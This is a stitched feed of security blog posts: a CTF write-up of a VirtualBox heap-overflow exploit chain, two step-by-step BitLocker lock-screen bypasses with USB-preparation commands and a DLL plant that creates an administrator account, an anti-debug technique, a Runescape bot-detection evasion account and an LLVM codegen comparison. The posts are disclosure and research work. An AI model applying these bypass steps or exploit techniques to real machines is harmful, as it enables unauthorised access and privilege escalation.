The driver first has to initiate the SCSI state machine with a bufsize. Then we read bufsize-1 bytes and then we read 9 bytes. We chose 9 instead of 2 byte in order to have the buffer pointer 8 byte aligned after the overflow. Finally, we overwrite the next 10000kb after our allocated buffer+8 with 0xdeadbeef.

After loading this driver in the win7 guest, this is what we get:

As expected, the VM crashes because we corrupted the heap. Now we know that our OOB read/write works and since working with drivers was annoying, we decided to modify the driver one last time to expose the vulnerability to user-space. The driver was modified to accept this Req struct via an IOCTL:

enum operations {

typedef struct {
    volatile unsigned int port;
    volatile unsigned int operation;
    volatile unsigned int data_byte_out;
} Req;

This enables us to use the driver as a bridge to communicate with the SCSI device from any user-space program. This makes exploit prototyping a whole lot faster and has the added benefit of removing the need to touch Windows drivers ever again (well, for the rest of this exploit anyway :D).

The bug gives us a liner heap OOB read/write primitive. Our goal is to get from here to arbitrary code execution so let’s put this bug to use!

Leaking vboxc.dll and heap addresses

We’re able to dump heap data using our OOB read but we’re still far from code execution. This is a good point to start leaking addresses. The least we’ll require for nice exploitation is a code leak (i.e. leaking the address of any dll in order to get access to gadgets) and a heap address leak to facilitate any post exploitation we might want to do.

This calls for a heap spray to get some desired objects after our leak object to read their pointers. We’d like the objects we spray to tick the following boxes:

  1. Contains a pointer into a dll
  2. Contains a heap address
  3. (Contains some kind of function pointer which might get useful later on)

After going through some options, we eventually opted for an HGCMMsgCall spray. Here’s it’s (stripped down) structure. It’s pretty big so I removed any parts that we don’t care about:

class HGCMMsgCall: public HGCMMsgHeader
    // A list of parameters including a 
    // char[] with controlled contents
    // [...]

class HGCMMsgHeader: public HGCMMsgCore
        // [...]
        /* Port to be informed on message completion. */

typedef struct PDMIHGCMPORT
    // [...]
     * Checks if @a pCmd was cancelled.
     * @returns true if cancelled, false if not.
     * @param   pInterface          Pointer to this interface.
     * @param   pCmd                The command we're checking on.
    // [...]


class HGCMMsgCore : public HGCMReferencedObject
        // [...]
        /** Next element in a message queue. */
        HGCMMsgCore *m_pNext;
        /** Previous element in a message queue.
         *  @todo seems not necessary. */
        HGCMMsgCore *m_pPrev;
        // [...]

It contains a VTable pointer, two heap pointers (m_pNext and m_pPrev) because HGCMMsgCall objects are managed in a doubly linked list and it has a callback function pointer in m_pfnCallback so HGCMMsgCall definitely fits the bill for a good spray target. Another nice thing is that we’re able to call the pHGCMPort->pfnIsCmdCancelled pointer at any point we like. This works because this pointer gets invoked on all the already allocated messages, whenever a new message is created. HGCMMsgCall’s size is 0x70, so we’ll have to initiate the SCSI state machine with the same size to ensure our buffer gets allocated in the same heap region as our sprayed objects.

Conveniently enough, niklasb has already prepared a function we can borrow to spray HGCMMsgCall objects.

Calling niklas’ wait_prop function will allocate a HGCMMsgCall object with a controlled pszPatterns field. This char array is very useful because it is referenced by the sprayed objects and can be easily identified on the heap.

Spraying on a Low-fragmentation Heap can be a little tricky but after some trial and error we got to the following spray strategy:

  1. We iterate 64 times
  2. Each time we create a client and spray 16 HGCMMsgCalls

That way, we seemed to reliably get a bunch of the HGCMMsgCalls ahead of our leak object which allows us to read and write their fields.

First things first: getting the code leak is simple enough. All we have to do is to read heap memory until we find something that matches the structure of one of our HGCMMsgCall and read the first quad-word of said object. The VTable points into VBoxC.dll so we can use this leak to calculate the base address of VBoxC.dll for future use.

Getting the heap leak is not as straight forward. We can easily read the m_pNext or m_pPrev fields to get a pointer to some other HGCMMsgCall object but we don’t have any clue about where that object is located relatively to our current buffer position. So reading m_pNext and m_pPrev of one object is useless… But what if we did the same for a second object? Maybe you can already see where this is going. Since these objects are organized in a doubly linked list, we can abuse some of their properties to match an object A to it’s next neighbor B.

This works because of this property:

addr(B) - addr(A) == A->m_pNext - B->m_pPrev

To get the address of B, we have to do the following:

  1. Read object A and save the pointers
  2. Take note of how many bytes we had to read until we found the next object B in a variable x
  3. Read object B and save the pointers
  4. If A->m_pNext - B->m_pPrev == x we most likely found the right neighbor and know that B is at A->m_pNext. If not, we just keep reading objects

This is pretty fast and works somewhat reliably. Equipped with our heap address and VBoxC.dll base address leak, we can move on to hijacking the execution flow.

Getting RIP control

Remember those pfnIsCmdCancelled callbacks? Those will make for a very short “Getting RIP control” section… :P

There’s really not that much to this part of the exploit. We only have to read heap data until we find another one of our HGCMMsgCalls and overwrite m_pfnCallback. As soon as a new message gets allocated, this method is called on our corrupted object with a malicious pHgcmPort->pfnIsCmdCancelled field.

 * @interface_method_impl{VBOXHGCMSVCHELPERS,pfnIsCallCancelled}
/* static */ DECLCALLBACK(bool) HGCMService::svcHlpIsCallCancelled(VBOXHGCMCALLHANDLE callHandle)
    HGCMMsgHeader *pMsgHdr = (HGCMMsgHeader *)callHandle;
    AssertPtrReturn(pMsgHdr, false);

    PVBOXHGCMCMD pCmd = pMsgHdr->pCmd;
    AssertPtrReturn(pCmd, false);

    PPDMIHGCMPORT pHgcmPort = pMsgHdr->pHGCMPort;   // We corrupted pHGCMPort
    AssertPtrReturn(pHgcmPort, false);

    return pHgcmPort->pfnIsCmdCancelled(pHgcmPort, pCmd);   // --- Profit ---

Internally, svcHlpIsCallCancelled will load pHgcmPort into r8 and execute a jmp [r8+0x10] instruction. Here’s what happens if we corrupt m_pfnCallback with 0x0000000041414141:

Code execution

At this point, we are able to redirect code execution to anywhere we want. But where do we want to redirect it to? Oftentimes getting RIP control is already enough to solve CTF pwnables. Glibc has these one-gadgets which are basically addresses you jump to, that will instantly give you a shell. But sadly there is no leak-kernel32dll-set-rcx-to-calc-and-call-WinExec one-gadget in VBoxC.dll which means we’ll have to get a little creative once more. ROP is not an option because we don’t have stack control so the only thing left is JOP(Jump-Oriented-Programming).

JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out, that WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec and thereby giving it enough space to do all the stack setup it likes ;)


‘nuff said! Here’s the demo:

You can find this version of our exploit here.


Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D


This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next years edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

BitLocker Lockscreen bypass

By: Jonas L
15 January 2021 at 23:00

BitLocker is a modern data protection feature that is deeply integrated in the Windows kernel. It is used by many corporations as a means of protecting company secrets in case of theft. Microsoft recommends that you have a Trusted Platform Module which can do some of the heavy cryptographic lifting for you.

Bypassing BitLocker in 6 easy steps

Given a Windows 10 system without known passwords and a BitLocker-protected hard drive, an administrator account could be adding by doing the following:

  • At the sign-in screen, select “I have forgotten my password.”
  • Bypass the lock and enable autoplay of removable drives.
  • Insert a USB stick with my .exe and a junction folder.
  • Run executable.
  • Remove the thumb drive and put it back in again, go to the main screen.
  • From there launch narrator, that will execute a DLL payload planted earlier.

Now a user account is added called hax with password “hax” with membership in Administrators. To update the list with accounts to log into, click I forgot my password and then return to the main screen.

Bypassing the lock screen

First, we select the “I have forgotten my password/PIN” option. This option launches an additional session, with an account that gets created/deleted as needed; the user profile service calls it a default-account. It will have the first available name of defaultuser1, defaultuser100000, defaultuser100001, etc.

To escape the lock, we have to use the Narrator because if we manage to launch something, we cannot see it, but using the Narrator, we will be able to navigate it. However, how do we launch something?

If we smash shift 5 times in quick succession, a link to open the Settings app appears, and the link actually works. We cannot see the launched Settings app. Giving the launched app focus is slightly tricky; you have to click the link and then click a place where the launched app would be visible with the correct timing. The easiest way to learn to do it is, keep clicking the link roughly 2 times a second. The sticky keys windows will disappear. Keep clicking! You will now see a focus box is drawn in the middle of the screen. That was the Settings app, and you have to stop clicking when it gets focus.

Now we can navigate the Settings app using CapsLock + Left Arrow, press that until we reach Home. Now, when Home has focus, hold down Caps Lock and press Enter. Using CapsLock + Right Arrow navigate to Devices and CapsLock + Enter when it is in focus.

Now navigate to AutoPlay, CapsLock + Enter and choose “Open Folder to view files (File Explorer).” Now insert the prepared USB drive, wait some seconds, the Narrator will announce the drive has been opened, and the window is focused. Now select the file Exploit.exe and execute it with CapsLock + Enter. That is arbitrary code execution, ladies and gentlemen, without using any passwords. However, we are limited by running as the default profile.

I have made a video with my phone, as I cannot take screenshots.

Elevation of privilege

When a USB stick is mounted, BitLocker will create a directory named ClientRecoveryPasswordRotation in System Volume Information and set permissions to:

NT AUTHORITY\Authenticated Users:(F)

To redirect the create operation, a symbolic link in the NT namespace is needed as that allows us to control the filename, and the existence of the link does not abort the operation as it is still creating the directory.

Therefore, take a USB drive and make \System Volume Information a mount point targeting \RPC Control. Then make a symbolic link in \RPC Control\ClientRecoveryPasswordRotation targetting \??\C:\windows\system32\Narrator.exe.local. If the USB stick is reinserted then the folder C:\windows\system32\Narrator.exe.local will be created with permissions that allows us to create a subdirectory:

Inside this subdirectory, we drop a payload DLL named comctl32.dll. Next time the Narrator is triggered, it will load the DLL. By the way, I chose the Narrator as that is triggerable from the login screen as a system service and is not auto-loaded, so if anything goes wrong, we can still boot.

Combining them

The ClientRecoveryPasswordRotation exploit to work requires a symbolic link in \RPC Control. The executable on the USB drive creates the link using two calls to DefineDosDevice, making the link permanent so they can survive a logout/in if needed.

Then a loop is started in which the executable will:

  • Try to create the subdirectory.
  • Plant the payload comctl32.dll inside it.

It is easy to see when the loop is running because the Narrator will move its focus box and say “access denied” every second. We can now use the link created in RPC Control. Unplug the USB stick and reinsert it. The writeable directory will be created in System32; on the next loop iteration, the payload will get planted, and exploit.exe will exit. To test if the exploit has been successful, close the Narrator and try to start it again.

If the narrator does not work, it is because the DLL is planted, and Narrator executes it, but it fails to add an account because it is launched as defaultuser1. When the payload is planted, you will need to click back to the login screen and start Narrator; 3 beeps should play, and a message box saying the DLL has been loaded as SYSTEM should show. Great! The account has been created, but it is not in the list. Press “I forgot my password” and click back to update the list.

A new account named hax should appear, with password hax.

Making a malicious USB

I used these steps to arm the USB device

C:\Users\jonas>format D: /fs:ntfs /q
Insert new disk for drive D:
Press ENTER when ready...
File System: NTFS.
Quick Formatting 30.0 GB
Volume label (32 characters, ENTER for none)?
Creating file system structures.
Format complete.
30.0 GB total disk space.
30.0 GB are available.

Now, we need to elevate to admin to delete System Volume Information.

D:\>takeown /F "System Volume Information"

This results in

SUCCESS: The file (or folder): "D:\System Volume Information" now owned by user "DESKTOP-LTJEFST\jonas".

We can then

D:\>icacls "System Volume Information" /grant Everyone:(F)
Processed file: System Volume Information
Successfully processed 1 files; Failed processing 0 files
D:\>rmdir /s /q "System Volume Information"

We will use James Forshaw’s tool (attached) to create the mount point.

D:\>createmountpoint "System Volume Information" "\RPC Control"

Then copy the attached exploit.exe to it.

D:\>copy c:\Users\jonas\source\repos\exploitKit\x64\Release\exploit.exe .
1 file(s) copied.


I disclosed this vulnerability and it was assigned CVE-2020-1398. Its patch can be found here

Process on a diet: anti-debug using job objects

By: jm
20 January 2021 at 23:00

In the second iteration of our anti-debug series for the new year, we will be taking a look at one of my favorite anti-debug techniques. In short, by setting a limit for process memory usage that is less or equal to current memory usage, we can prevent the creation of threads and modification of executable memory.

Job Object Basics

While job objects may seem like an obscure feature, the browser you are reading this article on is most likely using them (if you are a Windows user, of course). They have a ton of capabilities, including but not limited to:

  • Disabling access to user32 functionality.
  • Limiting resource usage like IO or network bandwidth and rate, memory commit and working set, and user-mode execution time.
  • Assigning a memory partition to all processes in the job.
  • Offering some isolation from the system by “upgrading” the job into a silo.

As far as API goes, it is pretty simple - creation does not really stand out from other object creation. The only other APIs you will really touch is NtAssignProcessToJobObject whose name is self-explanatory, and NtSetInformationJobObject through which you will set all the properties and capabilities.

NTSTATUS NtCreateJobObject(HANDLE*            JobHandle,
                           ACCESS_MASK        DesiredAccess,
                           OBJECT_ATTRIBUTES* ObjectAttributes);

NTSTATUS NtAssignProcessToJobObject(HANDLE JobHandle, HANDLE ProcessHandle);

NTSTATUS NtSetInformationJobObject(HANDLE JobHandle, JOBOBJECTINFOCLASS InfoClass,
                                   void*  Info,      ULONG              InfoLen);

The Method

With the introduction over, all one needs to create a job object, assign it to a process, and set the memory limit to something that will deny any attempt to allocate memory.

HANDLE job = nullptr;
NtCreateJobObject(&job, MAXIMUM_ALLOWED, nullptr);

NtAssignProcessToJobObject(job, NtCurrentProcess());

limits.ProcessMemoryLimit               = 0x1000;
limits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_PROCESS_MEMORY;
NtSetInformationJobObject(job, JobObjectExtendedLimitInformation,
                          &limits, sizeof(limits));

That is it. Now while it is sufficient to use only syscalls and write code where you can count the number of dynamic allocations on your fingers, you might need to look into some of the affected functions to make a more realistic program compatible with this technique, so there is more work to be done in that regard.

The implications

So what does it do to debuggers and alike?

  • Visual Studio - unable to attach.
  • WinDbg
    • Waits 30 seconds before attaching.
    • cannot set breakpoints.
  • x64dbg
    • will not be able to attach (a few months old).
    • will terminate the process of placing a breakpoint (a week or so old).
    • will fail to place a breakpoint.

Please do note that the breakpoint protection only works for pages that are not considered private. So if you compile a small test program whose total size is less than a page and have entry breakpoints or count it into the private commit before reaching anti-debug code - it will have no effect.


Although this method requires you to be careful with your code, I personally love it due to its simplicity and power. If you cannot see yourself using this, do not worry! You can expect the upcoming article to contain something that does not require any changes to your code.

BitLocker touch-device lockscreen bypass

29 January 2021 at 23:00

Microsoft has for the past years done a great job at hardening the Windows lockscreen, but after Jonas published CVE-2020-1398, I put effort into weaponizing an old bug I had found in Windows Touch devices.

These exploits rely on the fundamental design of the Windows Lockscreen, where the instance that prompts the user for password runs with SYSTEM privileges. This means that even though most of the UI is blocked, you can always find a way to do some damage when there are options like “Reset password”

Clicking this button will result in a new user being created with the name of defaultuser1, defaultuser100000, defaultuser100001 (et cetera), and a new instance of WWAHost asking for user account credentials will be spawned. If everything is in order, it will ask you for a new pin, otherwise you will be stuck in this instance.

Bypassing BitLocker in 5 easy steps

  • Connect a physical keyboard
  • Enable the narrator
  • Select “I have forgotten my password.” and “Text <phonenumber>”
  • Change the size of the on-screen keyboard and open keyboard settings
  • Interact with the hidden settings window to execute our payload


To exploit this vulnerability, you will need:

  1. A surface touchscreen device. I used a surface book 2 15’ (Running up-to-date Windows 10 20H2 with BitLocker enabled)
  2. A external keyboard
  3. A flash drive containing your payload.

Keyboard confusion

By connecting a external keyboard to our Surface device, we have the capability using both the on-screen and the physical keyboard. This is necessary to abuse certain functionality that allows us to bypass the lockscreen.


Windows includes various accessibility features such as narration. This functionality allows us to operate on hidden UI elements, as the narrator will read any selected element out loud, visible or not. Turn it on by clicking Windows+U and selecting “Enable narrator”

I forgot my password

A Forgotten password is one of the few cases you would ever do anything but login on the Windows lockscreen. The first part of our bypass requires you to select “I have forgotten my password.” on the login screen. This will open up a Microsoft Account login form, where you can choose to recover your password by texting a certain phone number. Selecting this opens up a text bar where you would normally type in the full recovery phone number, but in our case that is not the point. By opening this text bar, we can make the touch device display an on screen keyboard, which was the goal all along. With this software keyboard, you can change the size of the keyboard by hitting the options button in the top left, choose the largest keyboard available.

Now you should have a large software keyboard where you can open the settings menu:

After initialising the launch of keyboard settings, there is a small time frame where you can double click on this grey area here:

If you did this successfully, the narrator should explicitly say “Settings window”

Navigating settings

You wouldn’t think you could much with a hidden settings window on a locked Windows device, but you can actually navigate said window with a external keyboard. While holding down the Caps Lock key, the arrow keys and the tab key can be used to navigate UI elements.

One weaponization of this is going to Autoplay -> Removable drives -> Open folder to view files. This launches File Explorer, where you can execute windows binaries from a usb thumb-drive.


I reported the issue to MSRC, but they ignored the bug report citing a need of PoC, which I had already provided, they had also expressed disbelief towards the exploitability of this bug.


How Runescape catches botters, and why they didn’t catch me

By: vmcall
3 April 2021 at 23:00

Player automation has always been a big concern in MMORPGs such as World of Warcraft and Runescape, and this kind of game-hacking is very different from traditional cheats in for example shooter games.

One weekend, I decided to take a look at the detection systems put in place by Jagex to prevent player automation in Runescape.


For the past months, an account named sch0u has been playing on world 67 around the clock doing mundane tasks such as killing mobs or harvesting resources. At first glance, this account looks just like any other player, but there is one key difference: it’s a bot.

I started this bot back in October with the goal of testing the limits of their bot detection system. I tried to find information online on how Jagex combats these botters, and only found videos of commercial bots bragging about how their mouse movement systems are indistinguishable from humans.

Therefore, the only thing I could deduce was that mouse movement matters, or does it?


I started by analyzing the Runescape client to confirm this theory, and quickly noticed a global called hhk set shortly launch.

const auto module_handle = GetModuleHandleA(0);
hhk = SetWindowsHookExA(WH_MOUSE_LL, rs::mouse_hook_handler, module_handle, 0);

This installs a low level hook on the mouse by appending to the system-wide hook chain. This allows applications on Windows to intercept all mouse events, whether or not the events are related to your application. Low level hooks are frequently used by keyloggers, but have legitimate use cases such as heuristics like the aforementioned mouse hook.

The Runescape mouse handler is quite simple in its essence (the following pseudocode has been beautified by hand):

LRESULT __fastcall rs::mouse_hook_handler(int code, WPARAM wParam, LPARAM lParam)
  if ( rs::client::singleton )
      // Call the internal logging handler
      rs::mouse_hook_handler_internal(rs::client::singleton->window_ctx, wParam, lParam);
  // Pass the information to the next hook on the system
  return CallNextHookEx(hhk, code, wParam, lParam);
void __fastcall rs::mouse_hook_handler_internal(rs::window_ctx *window_ctx, __int64 wparam, _DWORD *lparam)
  // If the mouse event happens outside of the Runescape window, don't log it.
  if (!window_ctx->event_inside_of_window(lparam))

  switch (wparam)
    case WM_MOUSEMOVE:

for bandwidth reasons, these rs::heuristics::log_* functions use simple algorithms to skip event data that resembles previous logged events.

This event data is later parsed by the function rs::heuristics::process, which is called every frame by the main render loop.

void __fastcall rs::heuristics::process(rs::heuristic_engine *heuristic_engine)
  // Don't process any data if the player is not in a world
  auto client = heuristic_engine->client;
  if (client->state != STATE_IN_GAME)

  // Make sure the connection object is properly initialised
  auto connection = client->network->connection;
  if (!connection || connection->server->mode != SERVER_INITIALISED)

  // The following functions parse and pack the event data, and is later sent
  // by a different component related to networking that has a queue system for
  // packets.

  // Process data gathered by internal handlers

  // Process data gathered by the low level mouse hook

Away from keyboard?

While reversing, I put effort into knowing the relevance of the function I am looking at, primarily by hooking or patching the function in question. You can usually deduce the relevance of a function by rendering it useless and observing the state of the software, and this methodology lead to an interesting observation.

By preventing the game from calling the function rs::heuristics::process, I didn’t immediately notice anything, but after exactly five minutes, I was logged out of the game. Apparently, Runescape decides if a player is inactive by solely looking at the heuristic data sent to the server by the client, even though you can play the game just fine. This raised a new question: If the server doesn’t think I am playing, does it think I am botting?.

This lead to spending a few days reverse engineering the networking layer of the game, which resulted in my ability to bot almost anything using only network packets.

To prove my theory, I botted twenty four hours a day, seven days a week, without ever moving my mouse. After doing this for thousands of hours, I can safely state that their bot detection either relies on the heuristic event data sent by the client, or is only run when the player is not “afk”. Any player that manages to play without moving their mouse should be banned immediately, thus making this oversight worth revisiting.

A look at LLVM - comparing clamp implementations

By: duk
9 April 2021 at 00:00

Please note that this is not an endorsement or criticism of either of these languages. It’s simply something I found interesting with how LLVM handles code generation between the two. This is an implementation quirk, not a language issue.

Update (April 9, 2021): A bug report was filed and a fix was pushed!

The LLVM project is a modular set of tools that make designing and implementing a compiler significantly easier. The most well known part of LLVM is their intermediate representation; IR for short. LLVM’s IR is an extremely powerful tool, designed to make optimization and targeting many architectures as easy as possible. Many tools use LLVM IR; the Clang C++ compiler and the Rust compiler (rustc) are both notable examples. However, despite this unified architecture, code generation can still vary wildly between implementations and how the IR is used. Some time ago, I stumbled upon this tweet discussing Rust’s implementation of clamping compared to C++:

Rust 1.50 is out and has f32.clamp. I had extremely low expectations for performance based on C++ experience but as usual Rust proves to be "C++ done right".

Of course Zig already has clamp and also gets codegen right.

— Arseny Kapoulkine (@zeuxcg) February 11, 2021

Rust’s code generation on the latest version of LLVM is far superior compared to an equivalent Clang version using std::clamp, even though they use the same underlying IR:

With f32.clamp:

pub fn clamp(v: f32) -> f32 {
    v.clamp(-1.0, 1.0)

The corresponding assembly is shown below. It is short, concise, and pretty much the best you’re going to get. We can see two memory accesses to get the clamp bounds and efficient use of x86 instructions.

        .long   0xbf800000
        .long   0x3f800000
        movss   xmm1, dword ptr [rip + .LCPI0_0]
        maxss   xmm1, xmm0
        movss   xmm0, dword ptr [rip + .LCPI0_1]
        minss   xmm0, xmm1

Next is a short C++ program using std::clamp:

#include <algorithm>
float clamp2(float v) {
    return std::clamp(v, -1.f, 1.f);

The corresponding assembly is shown below. It is significantly longer with many more data accesses, conditional moves, and is in general uglier.

        .long   0x3f800000                         float 1
        .long   0xbf800000                         float -1
clamp2(float):                                     @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0
        mov     dword ptr [rsp - 8], -1082130432  
        mov     dword ptr [rsp - 12], 1065353216  
        ucomiss xmm0, dword ptr [rip + .LCPI1_0]  
        lea     rax, [rsp - 12]
        lea     rcx, [rsp - 4]
        cmova   rcx, rax
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0
        lea     rax, [rsp - 8]
        cmovbe  rax, rcx
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero

Interestingly enough, reimplementing std::clamp causes this issue to disappear:

float clamp(float v, float lo, float hi) {
    v = (v < lo) ? lo : v;
    v = (v > hi) ? hi : v;
    return v;

float clamp1(float v) {
    return clamp(v, -1.f, 1.f);

The assembly generated here is the same as with Rust’s implementation:

        .long   0xbf800000                        # float -1
        .long   0x3f800000                        # float 1
clamp1(float):                                    # @clamp1(float)
        movss   xmm1, dword ptr [rip + .LCPI0_0]  # xmm1 = mem[0],zero,zero,zero
        maxss   xmm1, xmm0 
        movss   xmm0, dword ptr [rip + .LCPI0_1]  # xmm0 = mem[0],zero,zero,zero
        minss   xmm0, xmm1

Clearly, something is off between std::clamp and our implementation. According to the C++ reference, std::clamp takes two references along with a predicate (which defaults to std::less) and returns a reference. Functionally, the only difference between our code and std::clamp is that we do not use reference types. Knowing this, we can then reproduce the issue.

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);

Once again, we’ve generated the same bad code as with std::clamp:

        .long   0x3f800000                        # float 1
        .long   0xbf800000                        # float -1
clamp2(float):                                    # @clamp2(float)
        movss   dword ptr [rsp - 4], xmm0 
        mov     dword ptr [rsp - 8], -1082130432 
        mov     dword ptr [rsp - 12], 1065353216 
        ucomiss xmm0, dword ptr [rip + .LCPI1_0] 
        lea     rax, [rsp - 12] 
        lea     rcx, [rsp - 4] 
        cmova   rcx, rax 
        movss   xmm1, dword ptr [rip + .LCPI1_1]  # xmm1 = mem[0],zero,zero,zero
        ucomiss xmm1, xmm0 
        lea     rax, [rsp - 8] 
        cmovbe  rax, rcx 
        movss   xmm0, dword ptr [rax]             # xmm0 = mem[0],zero,zero,zero

LLVM IR and Clang

LLVM IR is a Static Single Assignment (SSA) intermediate representation. What this means is that every variable is only assigned to once. In order to represent conditional assignments, SSA form uses a special type of instruction called a “phi” node, which picks a value based on the block that was previously running. However, Clang does not initially use phi nodes. Instead, to make initial code generation easier, variables in functions are allocated on the stack using alloca instructions. Reads and assignments to the variable are load and store instructions to the alloca, respectively:

int main() {
    float x = 0;

In this unoptimized IR, we can see an alloca instruction that then has the float value 0 stored to it:

define dso_local i32 @main() #0 {
  %1 = alloca float, align 4
  store float 0.000000e+00, float* %1, align 4
  ret i32 0

LLVM will then (hopefully) optimize away the alloca instructions with a relevant pass, like SROA.

LLVM IR and reference types

Reference types are represented as pointers in LLVM IR:

void test(float& x2) {
    x2 = 1;

In this optimized IR, we can see that the reference has been converted to a pointer with specific attributes.

define dso_local void @_Z4testRf(float* nocapture nonnull align 4 dereferenceable(4) %0) local_unnamed_addr #0 {
  store float 1.000000e+00, float* %0, align 4, !tbaa !2
  ret void

When a function is given a reference type as an argument, it is passed the underlying object’s address instead of the object itself. Also passed is some metadata about reference types. For example, nonnull and dereferenceable are set as attributes to the argument because the C++ standard dictates that references always have to be bound to a valid object. For us, this means the alloca instructions are passed directly to the clamp function:

__attribute__((noinline)) const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;

float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);

In this optimized IR, we can see alloca instructions passed to bad_clamp corresponding to the variables passed as references.

define linkonce_odr dso_local nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %0, float* nonnull align 4 dereferenceable(4) %1, float* nonnull align 4 dereferenceable(4) %2) local_unnamed_addr #2 comdat {
  %4 = load float, float* %0, align 4
  %5 = load float, float* %1, align 4
  %6 = fcmp olt float %4, %5
  %7 = load float, float* %2, align 4
  %8 = fcmp ogt float %4, %7
  %9 = select i1 %8, float* %2, float* %0
  %10 = select i1 %6, float* %1, float* %9
  ret float* %10

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #1 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4
  store float -1.000000e+00, float* %3, align 4
  store float 1.000000e+00, float* %4, align 4                                                                                                                                         
  %6 = call nonnull align 4 dereferenceable(4) float* @_Z9bad_clampRKfS0_S0_(float* nonnull align 4 dereferenceable(4) %2, float* nonnull align 4 dereferenceable(4) %3, float* nonnull align 4 dereferenceable(4) %4)
  %7 = load float, float* %7, align 4
  ret float %7

Lifetime annotations are omitted to make the IR a bit clearer.

In this example, the noinline attribute was used to demonstrate passing references to functions. If we remove the attribute, the call is inlined into the function:

const float& bad_clamp(const float& v, const float& lo, const float& hi) {
    return (v < lo) ? lo : (v > hi) ? hi : v;
float clamp2(float v) {
    return bad_clamp(v, -1.f, 1.f);

However, even after optimization, the alloca instructions are still there for seemingly no good reason. These alloca instructions should have been optimized away by LLVM’s passes; they’re not used anywhere else and there are no tricky stores or lifetime problems.

define dso_local float @_Z6clamp2f(float %0) local_unnamed_addr #0 {
  %2 = alloca float, align 4
  %3 = alloca float, align 4
  %4 = alloca float, align 4
  store float %0, float* %2, align 4, !tbaa !2
  store float -1.000000e+00, float* %3, align 4, !tbaa !2
  store float 1.000000e+00, float* %4, align 4, !tbaa !2
  %5 = fcmp olt float %0, -1.000000e+00
  %6 = fcmp ogt float %0, 1.000000e+00
